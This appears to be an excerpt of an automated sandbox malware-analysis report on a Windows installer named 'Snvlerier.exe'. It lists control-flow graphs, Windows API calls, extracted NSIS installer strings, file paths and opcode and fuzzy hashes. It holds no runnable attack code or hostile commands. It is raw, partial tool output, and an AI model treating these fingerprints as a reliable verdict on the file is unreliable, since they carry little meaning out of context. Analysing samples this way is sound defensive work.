                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: ca67b10b3c831e45463180b69d230d950dbbf1bd5d1b32b11b7271c2ef6dbc25
                                              • Instruction ID: 4983a135424315bfff9fd91e6859b19d16dd49e4a544da28eb7079a2e0037039
                                              • Opcode Fuzzy Hash: ca67b10b3c831e45463180b69d230d950dbbf1bd5d1b32b11b7271c2ef6dbc25
                                              • Instruction Fuzzy Hash: 43026FB0A00209AFEB209F54DD45AAE7BB5FB84315F14817AF710BA2E1C7799E41CF58

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 479 405d0f-405d1a 480 405d1c-405d2b 479->480 481 405d2d-405d42 479->481 480->481 482 405f35-405f39 481->482 483 405d48-405d53 481->483 484 405d65-405d6f 482->484 485 405f3f-405f49 482->485 483->482 486 405d59-405d60 483->486 484->485 489 405d75-405d7c 484->489 487 405f54-405f55 485->487 488 405f4b-405f4f call 405ced 485->488 486->482 488->487 491 405d82-405db7 489->491 492 405f28 489->492 493 405ed2-405ed5 491->493 494 405dbd-405dc8 GetVersion 491->494 495 405f32-405f34 492->495 496 405f2a-405f30 492->496 499 405f05-405f08 493->499 500 405ed7-405eda 493->500 497 405de2 494->497 498 405dca-405dce 494->498 495->482 496->482 504 405de9-405df0 497->504 498->497 501 405dd0-405dd4 498->501 505 405f16-405f26 lstrlenA 499->505 506 405f0a-405f11 call 405d0f 499->506 502 405eea-405ef6 call 405ced 500->502 503 405edc-405ee8 call 405c4b 500->503 501->497 507 405dd6-405dda 501->507 517 405efb-405f01 502->517 503->517 509 405df2-405df4 504->509 510 405df5-405df7 504->510 505->482 506->505 507->497 513 405ddc-405de0 507->513 509->510 515 405e30-405e33 510->515 516 405df9-405e1c call 405bd4 510->516 513->504 518 405e43-405e46 515->518 519 405e35-405e41 GetSystemDirectoryA 515->519 529 405e22-405e2b call 405d0f 516->529 530 405eb9-405ebd 516->530 517->505 521 405f03 517->521 523 405eb0-405eb2 518->523 524 405e48-405e56 GetWindowsDirectoryA 518->524 522 405eb4-405eb7 519->522 526 405eca-405ed0 call 405f58 521->526 522->526 522->530 523->522 528 405e58-405e62 523->528 524->523 526->505 532 405e64-405e67 528->532 533 405e7c-405e92 SHGetSpecialFolderLocation 528->533 529->522 530->526 535 405ebf-405ec5 lstrcatA 530->535 532->533 536 405e69-405e70 532->536 537 405e94-405eab SHGetPathFromIDListA CoTaskMemFree 533->537 538 405ead 533->538 535->526 540 405e78-405e7a 536->540 537->522 537->538 538->523 540->522 540->533
                                              APIs
                                              • GetVersion.KERNEL32(00000000,0041FCC0,00000000,00405032,0041FCC0,00000000), ref: 00405DC0
                                              • GetSystemDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E3B
                                              • GetWindowsDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E4E
                                              • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8A
                                              • SHGetPathFromIDListA.SHELL32(00000000,Space required: ), ref: 00405E98
                                              • CoTaskMemFree.OLE32(00000000), ref: 00405EA3
                                              • lstrcatA.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC5
                                              • lstrlenA.KERNEL32(Space required: ,00000000,0041FCC0,00000000,00405032,0041FCC0,00000000), ref: 00405F17
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                              • String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 900638850-1002770640
                                              • Opcode ID: 8f89907201eb93b417f1bddc8b228d60f19a73099febe13f5ea79c03e3db6f0f
                                              • Instruction ID: efc5ec780f790bf94871e82c5b1891b5d8682b798b8ff352a226fe191e4b7606
                                              • Opcode Fuzzy Hash: 8f89907201eb93b417f1bddc8b228d60f19a73099febe13f5ea79c03e3db6f0f
                                              • Instruction Fuzzy Hash: 76611531A04A05AAEF205F24DC887BB3B79DB15315F54813BE541B62D1D37D4A82DF8E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 772 4062c7-4062cc 773 40633d-40635b 772->773 774 4062ce-4062fd 772->774 775 406933-406948 773->775 776 406304-406308 774->776 777 4062ff-406302 774->777 781 406962-406978 775->781 782 40694a-406960 775->782 779 406310 776->779 780 40630a-40630e 776->780 778 406314-406317 777->778 783 406335-406338 778->783 784 406319-406322 778->784 779->778 780->778 785 40697b-406982 781->785 782->785 788 40650a-406528 783->788 786 406324 784->786 787 406327-406333 784->787 789 406984-406988 785->789 790 4069a9-4069b5 785->790 786->787 793 40639d-4063cb 787->793 791 406540-406552 788->791 792 40652a-40653e 788->792 794 406b37-406b41 789->794 795 40698e-4069a6 789->795 797 40614b-406154 790->797 798 406555-40655f 791->798 792->798 800 4063e7-406401 793->800 801 4063cd-4063e5 793->801 799 406b4d-406b60 794->799 795->790 806 406b62 797->806 807 40615a 797->807 803 406561 798->803 804 406502-406508 798->804 805 406b65-406b69 799->805 802 406404-40640e 800->802 801->802 813 406414 802->813 814 406385-40638b 802->814 815 406672-40667f 803->815 816 4064dd-4064e1 803->816 804->788 808 4064a6-4064b0 804->808 806->805 809 406161-406165 807->809 810 4062a1-4062c2 807->810 811 406206-40620a 807->811 812 406276-40627a 807->812 823 406af5-406aff 808->823 824 4064b6-4064d8 808->824 809->799 817 40616b-406178 809->817 810->775 821 406210-406229 811->821 822 406ab6-406ac0 811->822 819 406280-406294 812->819 820 406ac5-406acf 812->820 833 406ad1-406adb 813->833 834 40636a-406382 813->834 825 406391-406397 814->825 826 40643e-406444 814->826 815->797 827 4064e7-4064ff 816->827 828 406ae9-406af3 816->828 817->806 829 40617e-4061c4 817->829 830 406297-40629f 819->830 820->799 835 40622c-406230 821->835 822->799 823->799 824->815 825->793 831 4064a2 825->831 826->831 832 406446-406464 826->832 827->804 828->799 836 4061c6-4061ca 829->836 837 4061ec-4061ee 829->837 830->810 830->812 831->808 838 406466-40647a 832->838 839 40647c-40648e 832->839 833->799 834->814 835->811 840 406232-406238 835->840 841 4061d5-4061e3 GlobalAlloc 836->841 842 4061cc-4061cf GlobalFree 836->842 844 4061f0-4061fa 837->844 845 4061fc-406204 837->845 843 406491-40649b 838->843 839->843 846 406262-406274 840->846 847 40623a-406241 840->847 841->806 848 4061e9 841->848 842->841 843->826 849 40649d 843->849 844->844 844->845 845->835 846->830 850 406243-406246 GlobalFree 847->850 851 40624c-40625c GlobalAlloc 847->851 848->837 853 406423-40643b 849->853 854 406add-406ae7 849->854 850->851 851->806 851->846 853->826 854->799
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68c5bf8bcd09e952c22e1dda80918e65901e3e730aaccb063ae89ebe16ca530c
                                              • Instruction ID: a6b177fcd03a02e4db20b09df5e097028d877c2cb16ea982ceb78c2d1a7e0334
                                              • Opcode Fuzzy Hash: 68c5bf8bcd09e952c22e1dda80918e65901e3e730aaccb063ae89ebe16ca530c
                                              • Instruction Fuzzy Hash: DFF16471D00229CBDF28CFA8C8946ADBBB0FF45305F25816ED856BB281D7785A96CF44
                                              APIs
                                              • GetModuleHandleA.KERNEL32(?,?,?,00403292,00000008), ref: 0040602A
                                              • LoadLibraryA.KERNELBASE(?,?,?,00403292,00000008), ref: 00406035
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406046
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: AddressHandleLibraryLoadModuleProc
                                              • String ID:
                                              • API String ID: 310444273-0
                                              • Opcode ID: f6042d90a5593f4d0663ce0b57a12da237a015dc48afc49529581ba9d6452c04
                                              • Instruction ID: 905d5a1206532dd8672ce5f516205a859f8c43a961ed6859a957f320968da01d
                                              • Opcode Fuzzy Hash: f6042d90a5593f4d0663ce0b57a12da237a015dc48afc49529581ba9d6452c04
                                              • Instruction Fuzzy Hash: 75E0CD32E04111A7D320AB749D0493777ACAFC4741305083DF509F2151D734AC11D7BA
                                              APIs
                                              • FindFirstFileA.KERNELBASE(?,00421D30,004218E8,004058CB,004218E8,004218E8,00000000,004218E8,004218E8,?,?,74DF2EE0,004055EA,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00405FFC
                                              • FindClose.KERNEL32(00000000), ref: 00406008
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: e41aec257a5c89a7695225af9a5088175462de368b4f1238845d418d8ce5ba68
                                              • Instruction ID: 8040f4f16561ec7ef3783d7830e22ef223b17224879cfefed357ade18f830cec
                                              • Opcode Fuzzy Hash: e41aec257a5c89a7695225af9a5088175462de368b4f1238845d418d8ce5ba68
                                              • Instruction Fuzzy Hash: E6D012319590309BC3105B786D0C84BBA589F593307518A33B566F62F0C7389C62AAED

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 235 403b2a-403b3c 236 403b42-403b48 235->236 237 403c7d-403c8c 235->237 236->237 238 403b4e-403b57 236->238 239 403cdb-403cf0 237->239 240 403c8e-403cd6 GetDlgItem * 2 call 403ffd SetClassLongA call 40140b 237->240 243 403b59-403b66 SetWindowPos 238->243 244 403b6c-403b6f 238->244 241 403d30-403d35 call 404049 239->241 242 403cf2-403cf5 239->242 240->239 254 403d3a-403d55 241->254 246 403cf7-403d02 call 401389 242->246 247 403d28-403d2a 242->247 243->244 249 403b71-403b83 ShowWindow 244->249 250 403b89-403b8f 244->250 246->247 268 403d04-403d23 SendMessageA 246->268 247->241 253 403fca 247->253 249->250 255 403b91-403ba6 DestroyWindow 250->255 256 403bab-403bae 250->256 263 403fcc-403fd3 253->263 261 403d57-403d59 call 40140b 254->261 262 403d5e-403d64 254->262 264 403fa7-403fad 255->264 258 403bb0-403bbc SetWindowLongA 256->258 259 403bc1-403bc7 256->259 258->263 266 403c6a-403c78 call 404064 259->266 267 403bcd-403bde GetDlgItem 259->267 261->262 271 403f88-403fa1 DestroyWindow EndDialog 262->271 272 403d6a-403d75 262->272 264->253 269 403faf-403fb5 264->269 266->263 273 403be0-403bf7 SendMessageA IsWindowEnabled 267->273 274 403bfd-403c00 267->274 268->263 269->253 276 403fb7-403fc0 ShowWindow 269->276 271->264 272->271 277 403d7b-403dc8 call 405d0f call 403ffd * 3 GetDlgItem 272->277 273->253 273->274 278 403c02-403c03 274->278 279 403c05-403c08 274->279 276->253 305 403dd2-403e0e ShowWindow KiUserCallbackDispatcher call 40401f EnableWindow 277->305 306 403dca-403dcf 277->306 283 403c33-403c38 call 403fd6 278->283 284 403c16-403c1b 279->284 285 403c0a-403c10 279->285 283->266 288 403c51-403c64 SendMessageA 284->288 290 403c1d-403c23 284->290 285->288 289 403c12-403c14 285->289 288->266 289->283 293 403c25-403c2b call 40140b 290->293 294 403c3a-403c43 call 40140b 290->294 303 403c31 293->303 294->266 302 403c45-403c4f 294->302 302->303 303->283 309 403e10-403e11 305->309 310 403e13 305->310 306->305 311 403e15-403e43 GetSystemMenu EnableMenuItem SendMessageA 309->311 310->311 312 403e45-403e56 SendMessageA 311->312 313 403e58 311->313 314 403e5e-403e97 call 404032 call 405ced lstrlenA call 405d0f SetWindowTextA call 401389 312->314 313->314 314->254 323 403e9d-403e9f 314->323 323->254 324 403ea5-403ea9 323->324 325 403ec8-403edc DestroyWindow 324->325 326 403eab-403eb1 324->326 325->264 328 403ee2-403f0f CreateDialogParamA 325->328 326->253 327 403eb7-403ebd 326->327 327->254 330 403ec3 327->330 328->264 329 403f15-403f6c call 403ffd GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 328->329 329->253 335 403f6e-403f81 ShowWindow call 404049 329->335 330->253 337 403f86 335->337 337->264
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B66
                                              • ShowWindow.USER32(?), ref: 00403B83
                                              • DestroyWindow.USER32 ref: 00403B97
                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BB3
                                              • GetDlgItem.USER32(?,?), ref: 00403BD4
                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BE8
                                              • IsWindowEnabled.USER32(00000000), ref: 00403BEF
                                              • GetDlgItem.USER32(?,00000001), ref: 00403C9D
                                              • GetDlgItem.USER32(?,00000002), ref: 00403CA7
                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403CC1
                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D12
                                              • GetDlgItem.USER32(?,00000003), ref: 00403DB8
                                              • ShowWindow.USER32(00000000,?), ref: 00403DD9
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DEB
                                              • EnableWindow.USER32(?,?), ref: 00403E06
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E1C
                                              • EnableMenuItem.USER32(00000000), ref: 00403E23
                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E3B
                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E4E
                                              • lstrlenA.KERNEL32(004204E0,?,004204E0,Nonchaotically Setup), ref: 00403E77
                                              • SetWindowTextA.USER32(?,004204E0), ref: 00403E86
                                              • ShowWindow.USER32(?,0000000A), ref: 00403FBA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID: Nonchaotically Setup
                                              • API String ID: 3282139019-3885308702
                                              • Opcode ID: b0a19107b7221a68267336842b1521134f58ff72a1f62036bd47bc30bbd4199d
                                              • Instruction ID: 09b5447d5f6833912ba0fc65a14273907e8c5e9784814e2e85c82b18b082bf9c
                                              • Opcode Fuzzy Hash: b0a19107b7221a68267336842b1521134f58ff72a1f62036bd47bc30bbd4199d
                                              • Instruction Fuzzy Hash: 85C18171A04205BBDB316F61ED85E2B3ABDFB45706F40053EF641B21E1C739A9429B1E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 338 403798-4037b0 call 406018 341 4037b2-4037bd GetUserDefaultUILanguage call 405c4b 338->341 342 4037c4-4037f5 call 405bd4 338->342 345 4037c2 341->345 348 4037f7-403808 call 405bd4 342->348 349 40380d-403813 lstrcatA 342->349 347 403818-403841 call 403a5d call 405888 345->347 355 403847-40384c 347->355 356 4038c8-4038d0 call 405888 347->356 348->349 349->347 355->356 357 40384e-403872 call 405bd4 355->357 362 4038d2-4038d9 call 405d0f 356->362 363 4038de-403903 LoadImageA 356->363 357->356 364 403874-403876 357->364 362->363 366 403984-40398c call 40140b 363->366 367 403905-403935 RegisterClassA 363->367 368 403887-403893 lstrlenA 364->368 369 403878-403885 call 4057c5 364->369 378 403996-4039a1 call 403a5d 366->378 379 40398e-403991 366->379 370 403a53 367->370 371 40393b-40397f SystemParametersInfoA CreateWindowExA 367->371 375 403895-4038a3 lstrcmpiA 368->375 376 4038bb-4038c3 call 40579a call 405ced 368->376 369->368 373 403a55-403a5c 370->373 371->366 375->376 382 4038a5-4038af GetFileAttributesA 375->382 376->356 390 4039a7-4039c4 ShowWindow LoadLibraryA 378->390 391 403a2a-403a32 call 4050cc 378->391 379->373 385 4038b1-4038b3 382->385 386 4038b5-4038b6 call 4057e1 382->386 385->376 385->386 386->376 392 4039c6-4039cb LoadLibraryA 390->392 393 4039cd-4039df GetClassInfoA 390->393 398 403a34-403a3a 391->398 399 403a4c-403a4e call 40140b 391->399 392->393 395 4039e1-4039f1 GetClassInfoA RegisterClassA 393->395 396 4039f7-403a1a DialogBoxParamA call 40140b 393->396 395->396 403 403a1f-403a28 call 4036e8 396->403 398->379 401 403a40-403a47 call 40140b 398->401 399->370 401->379 403->373
                                              APIs
                                                • Part of subcall function 00406018: GetModuleHandleA.KERNEL32(?,?,?,00403292,00000008), ref: 0040602A
                                                • Part of subcall function 00406018: LoadLibraryA.KERNELBASE(?,?,?,00403292,00000008), ref: 00406035
                                                • Part of subcall function 00406018: GetProcAddress.KERNEL32(00000000,?), ref: 00406046
                                              • GetUserDefaultUILanguage.KERNELBASE(00000006,C:\Users\user\AppData\Local\Temp\,74DF3410,"C:\Users\user\Desktop\Snvlerier.exe",00000000), ref: 004037B2
                                                • Part of subcall function 00405C4B: wsprintfA.USER32 ref: 00405C58
                                              • lstrcatA.KERNEL32(1033,004204E0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204E0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3410,"C:\Users\user\Desktop\Snvlerier.exe",00000000), ref: 00403813
                                              • lstrlenA.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Local\Temp\carinal\Coracosteon,1033,004204E0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004204E0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403888
                                              • lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
                                              • GetFileAttributesA.KERNEL32(Space required: ), ref: 004038A6
                                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\carinal\Coracosteon), ref: 004038EF
                                              • RegisterClassA.USER32(00423680), ref: 0040392C
                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403944
                                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403979
                                              • ShowWindow.USER32(00000005,00000000), ref: 004039AF
                                              • LoadLibraryA.KERNELBASE(RichEd20), ref: 004039C0
                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 004039CB
                                              • GetClassInfoA.USER32(00000000,RichEdit20A,00423680), ref: 004039DB
                                              • GetClassInfoA.USER32(00000000,RichEdit,00423680), ref: 004039E8
                                              • RegisterClassA.USER32(00423680), ref: 004039F1
                                              • DialogBoxParamA.USER32(?,00000000,00403B2A,00000000), ref: 00403A10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Snvlerier.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\carinal\Coracosteon$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space required: $_Nb
                                              • API String ID: 2262724009-1032920556
                                              • Opcode ID: 204ec78dd39eaedeba3704eff6ac0dc7693ce6b5f7380e8485452e4e30ef1cc6
                                              • Instruction ID: 86ad9ebe9f44826ea1b643deee1a43d049e056e334e5a2e8d1df0f284f3377e3
                                              • Opcode Fuzzy Hash: 204ec78dd39eaedeba3704eff6ac0dc7693ce6b5f7380e8485452e4e30ef1cc6
                                              • Instruction Fuzzy Hash: BC61D371B44200BED720AF659D45F2B3AACEB4474AF40457FF940B22E1C67DAD068A2E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 408 402c83-402cd1 GetTickCount GetModuleFileNameA call 40599b 411 402cd3-402cd8 408->411 412 402cdd-402d0b call 405ced call 4057e1 call 405ced GetFileSize 408->412 413 402f22-402f26 411->413 420 402d11-402d28 412->420 421 402dfb-402e09 call 402be4 412->421 422 402d2a 420->422 423 402d2c-402d32 call 4031d0 420->423 428 402eda-402edf 421->428 429 402e0f-402e12 421->429 422->423 427 402d37-402d39 423->427 432 402e96-402e9e call 402be4 427->432 433 402d3f-402d45 427->433 428->413 430 402e14-402e25 call 403202 call 4031d0 429->430 431 402e3e-402e8a GlobalAlloc call 4060f8 call 4059ca CreateFileA 429->431 451 402e2a-402e2c 430->451 458 402ea0-402ed0 call 403202 call 402f29 431->458 459 402e8c-402e91 431->459 432->428 436 402dc5-402dc9 433->436 437 402d47-402d5f call 405956 433->437 440 402dd2-402dd8 436->440 441 402dcb-402dd1 call 402be4 436->441 437->440 455 402d61-402d68 437->455 447 402dda-402de8 call 40608a 440->447 448 402deb-402df5 440->448 441->440 447->448 448->420 448->421 451->428 456 402e32-402e38 451->456 455->440 460 402d6a-402d71 455->460 456->428 456->431 467 402ed5-402ed8 458->467 459->413 460->440 462 402d73-402d7a 460->462 462->440 464 402d7c-402d83 462->464 464->440 466 402d85-402da5 464->466 466->428 468 402dab-402daf 466->468 467->428 471 402ee1-402ef2 467->471 469 402db1-402db5 468->469 470 402db7-402dbf 468->470 469->421 469->470 470->440 472 402dc1-402dc3 470->472 473 402ef4 471->473 474 402efa-402eff 471->474 472->440 473->474 475 402f00-402f06 474->475 475->475 476 402f08-402f20 call 405956 475->476 476->413
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402C97
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Snvlerier.exe,00000400), ref: 00402CB3
                                                • Part of subcall function 0040599B: GetFileAttributesA.KERNELBASE(00000003,00402CC6,C:\Users\user\Desktop\Snvlerier.exe,80000000,00000003), ref: 0040599F
                                                • Part of subcall function 0040599B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C1
                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Snvlerier.exe,C:\Users\user\Desktop\Snvlerier.exe,80000000,00000003), ref: 00402CFC
                                              • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E43
                                              Strings
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDA
                                              • Error launching installer, xrefs: 00402CD3
                                              • C:\Users\user\Desktop\Snvlerier.exe, xrefs: 00402C9D, 00402CAC, 00402CC0, 00402CDD
                                              • Null, xrefs: 00402D7C
                                              • "C:\Users\user\Desktop\Snvlerier.exe", xrefs: 00402C83
                                              • Inst, xrefs: 00402D6A
                                              • C:\Users\user\Desktop, xrefs: 00402CDE, 00402CE3, 00402CE9
                                              • soft, xrefs: 00402D73
                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E8C
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C90, 00402E5B
                                              Memory Dump Source
